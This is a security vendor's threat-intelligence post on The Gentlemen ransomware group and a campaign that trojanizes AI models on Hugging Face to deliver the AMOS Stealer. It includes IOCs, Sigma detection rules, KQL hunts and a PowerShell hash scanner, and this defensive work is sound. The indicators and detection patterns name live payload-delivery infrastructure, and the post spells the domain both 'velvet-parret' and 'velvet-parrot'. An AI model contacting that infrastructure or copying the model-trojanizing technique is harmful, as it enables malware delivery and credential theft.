Back to Intelligence

The Gentlemen RaaS (Storm-2697) & AI Supply Chain (AMOS Stealer): OTX Pulse Analysis

SA
Security Arsenal Team
June 12, 2026
6 min read

Recent OTX pulses highlight a dual-threat landscape characterized by a sophisticated, high-volume Ransomware-as-a-Service (RaaS) operation and a proliferating AI supply chain attack campaign.

The Gentlemen (Storm-2697): Emerging from a split with the Qilin ransomware group, "The Gentlemen" has rapidly escalated into a major threat. Operating with a structured affiliate model, this group leverages Go-based ransomware binaries for fast encryption and utilizes a toolset including SystemBC (C2 tunneling), Cobalt Strike, and AnyDesk for lateral movement. Notably, the group exhibits a high success rate, with approximately 71-78% of victims paying ransoms to avoid public leaks. They are actively exploiting CVE-2024-55591 to gain initial access.

AI Supply Chain Compromise: A separate campaign targets the AI development ecosystem, specifically Hugging Face and ClawHub. Threat actors are trojanizing models and datasets to deliver the AMOS Stealer and cryptominers. By poisoning "skills" and repositories, attackers exploit the implicit trust developers place in open-source AI libraries, allowing for initial access into finance and technology sectors.

Threat Actor / Malware Profile

The Gentlemen (Storm-2697)

  • Origin: Split from Qilin ransomware in mid-2025 due to payment disputes. Likely affiliated with Russian-speaking actor 'hastalamuerte'.
  • Tooling:
    • Go Binary Ransomware: Custom-built for speed and cross-platform capability.
    • SystemBC: A robust RAT and proxy tool used to maintain C2 communications and bypass network restrictions.
    • PowerRun: Used for UAC bypass to execute payloads with elevated privileges.
    • Cobalt Strike: Used for post-exploitation and lateral movement.
  • TTPs: Double extortion, affiliate-driven operations, exploitation of external facing services (CVE-2024-55591).

AI Supply Chain (AMOS Stealer)

  • Vector: Trojanized models on Hugging Face and ClawHub; malicious "skills" (over 575 identified).
  • Payload: AMOS Stealer (targeting macOS and Windows), cryptominers.
  • Mechanism: Malicious code embedded within model weights or loading scripts triggers upon execution, fetching second-stage payloads from attacker-controlled infrastructure (e.g., install.app-distribution.net).

IOC Analysis

The provided indicators include:

  • File Hashes: Multiple MD5, SHA1, and SHA256 hashes associated with The Gentlemen ransomware binaries, payloads, and the AMOS Stealer.
  • CVE: CVE-2024-55591 is a critical vector for The Gentlemen affiliates.
  • Network Infrastructure: Tor Onion domains (*.onion) for data leak sites and negotiation, and clear-web IPs (91.92.242.30) used for payload delivery in the AI supply chain attacks.
  • Domains: velvet-parret.com and app-distribution.net serve as drop zones.

Operational Guidance: SOC teams should immediately load these hashes into EDR quarantine policies. The Onion domains must be blocked at the proxy level, though they require SSL inspection if traffic is routed over Tor. The clear-web IP and domains should be blocked on firewalls and DNS sinks.

Detection Engineering

YAML
---
title: Potential The Gentlemen RaaS Activity via PowerRun
id: 88776655-4433-2211-0000-112233445566
status: experimental
description: Detects execution of PowerRun.exe, a tool frequently abused by The Gentlemen affiliates for UAC bypass and execution of ransomware payloads.
author: Security Arsenal
date: 2026/06/12
references:
    - https://otx.alienvault.com/pulse/LBIOC-20260071
tags:
    - attack.privilege_escalation
    - attack.t1548.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\PowerRun.exe'
        CommandLine|contains:
            - '/c'
            - 'cmd.exe'
    condition: selection
falsepositives:
    - Legitimate administrative usage
level: high
---
title: SystemBC RAT Network Traffic
id: 99887766-5544-3322-1111-223344556677
status: experimental
description: Detects potential network traffic associated with SystemBC RAT, characterized by C2 connections often utilized by The Gentlemen operators.
author: Security Arsenal
date: 2026/06/12
references:
    - https://otx.alienvault.com/pulse/LBIOC-20260071
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationPort:
            - 80
            - 443
    filter_legit:
        DestinationHostname|endswith:
            - '.microsoft.com'
            - '.windowsupdate.com'
            - '.apple.com'
    condition: selection and not filter_legit
falsepositives:
    - Generic web browsing
level: medium
---
title: AI Supply Chain Malware Delivery
id: 00112233-4455-6677-8899-001122334455
status: experimental
description: Detects execution of scripts or binaries from AI development environments or connections to domains associated with the AMOS stealer campaign.
author: Security Arsenal
date: 2026/06/12
references:
    - https://otx.alienvault.com/pulse/LBIOC-20260073
tags:
    - attack.initial_access
    - attack.t1195.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\python.exe'
            - '\pythonw.exe'
            - '\powershell.exe'
    selection_cli:
        CommandLine|contains:
            - 'huggingface'
            - 'install.app-distribution.net'
            - '91.92.242.30'
            - 'clawhub'
    condition: all of selection_*
falsepositives:
    - Legitimate data science workflows
level: critical


kql
// Hunt for The Gentlemen Ransomware Hashes
DeviceFileEvents
| where SHA256 in ("7a311b584497e8133cd85950fec6132904dd5b02388a9feed3f5e057fb891d09", "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235", "4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71") or MD5 in ("a88daa62751c212b7579a57f1f4ae8f8", "408dd6ade80f2ebbc2e5470a1fb506f1", "4200b46a93c6ab059e2b34ce200c4a5b")
| project Timestamp, DeviceName, FolderPath, SHA256, MD5, InitiatingProcessAccountName
| order by Timestamp desc
;
// Hunt for AI Supply Chain Network IOCs
DeviceNetworkEvents
| where RemoteUrl has "install.app-distribution.net" or RemoteUrl has "huggingface" or RemoteIP == "91.92.242.30" or RemoteUrl has "velvet-parrot.com"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc


powershell
# IOC Hunt Script: The Gentlemen & AI Supply Chain
# Scans for specific file hashes and registry artifacts associated with AMOS/Gentlemen

$TargetHashes = @(
    "a88daa62751c212b7579a57f1f4ae8f8", # MD5 Gentlemen
    "7a311b584497e8133cd85950fec6132904dd5b02388a9feed3f5e057fb891d09", # SHA256 Gentlemen
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235", # SHA256 Gentlemen
    "a37f6403fbf28fa0b48863287f4c5a5d", # MD5 AMOS Stealer
    "f0a54f2b44e557854b0a5001c4e10185884af945814786f78b86539014f78a16"  # SHA256 AI Malware
)

Write-Host "[+] Scanning fixed drives for known malicious hashes..." -ForegroundColor Yellow

$Drives = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Used -gt 0 }

foreach ($Drive in $Drives) {
    Write-Host "Scanning drive $($Drive.Root)..."
    Get-ChildItem -Path $Drive.Root -Recurse -ErrorAction SilentlyContinue | Get-FileHash -Algorithm MD5, SHA256 -ErrorAction SilentlyContinue | Where-Object { 
        $_.Hash -in $TargetHashes 
    } | ForEach-Object {
        Write-Host "[!] MALICIOUS FILE FOUND: $($_.Path) | HASH: $($_.Hash)" -ForegroundColor Red
    }
}

Write-Host "[+] Checking for suspicious persistence mechanisms (AMOS/Gentlemen patterns)..." -ForegroundColor Yellow
$CommonPaths = @("$env:APPDATA", "$env:TEMP", "C:\ProgramData")
$suspiciousExts = @(".exe", ".dll", ".ps1")

foreach ($Path in $CommonPaths) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Include $suspiciousExts -Recurse -ErrorAction SilentlyContinue | Where-Object { 
        $_.CreationTime -gt (Get-Date).AddDays(-7) -and $_.Length -lt 500kb 
    } | Select-Object FullName, CreationTime, LastWriteTime
    }
}

Response Priorities

  • Immediate:
    • Block all listed IOCs (IPs, Domains, Hashes) at the perimeter and endpoint.
    • Patch systems against CVE-2024-55591 immediately.
    • Isolate any endpoints where PowerRun.exe or unsigned Go binaries were executed.
  • 24h:
    • Conduct credential reset for accounts used on machines where AMOS Stealer or The Gentlemen infrastructure was detected.
    • Review logs for successful VPN/Remote access logins correlating with the infection window.
  • 1 Week:
    • Implement strict egress filtering for Python/R/Julia package managers and AI repository downloads.
    • Audit all AI/ML development environments for unsigned or unverified model files.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwaregentlemen-ransomwareamos-stealersystembcai-supply-chainransomware-as-a-service

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action